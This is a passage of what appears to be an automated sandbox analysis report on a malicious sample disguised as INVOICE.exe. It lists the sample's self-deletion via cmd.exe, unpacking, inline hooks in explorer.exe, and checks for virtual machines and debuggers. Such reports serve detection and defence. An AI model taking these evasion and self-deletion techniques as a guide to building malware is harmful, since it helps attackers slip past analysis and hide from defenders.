          Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: systray.pdb source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE.exe, 00000000.00000003.198125696.00000000099C0000.00000004.00000001.sdmp, INVOICE.exe, 00000001.00000002.275776991.0000000000A80000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.463792021.00000000047A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INVOICE.exe, systray.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\INVOICE.exe | Unpacked PE file: 1.2.INVOICE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_73702F60 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00417B70 push edi; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00417CE3 push ss; iretd
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00416522 push F214C018h; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_004165F8 push ss; retf
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AFD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00417B70 push edi; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00417CE3 push ss; iretd
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00416522 push F214C018h; ret
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_004165F8 push ss; retf
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0481D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD075 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD0CB push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD0C2 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD12C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005C7B70 push edi; ret
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005C7CE3 push ss; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C6522 push F214C018h; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C65F8 push ss; retf
          Source: C:\Users\user\Desktop\INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
          Source: C:\Users\user\Desktop\INVOICE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\INVOICE.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000005B98E4 second address: 00000000005B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000005B9B4E second address: 00000000005B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Windows\explorer.exe TID: 3084Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6656Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.217826846.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210663934.0000000004E61000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000003.00000000.238550804.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.218298735.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.211101636.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INVOICE.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INVOICE.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
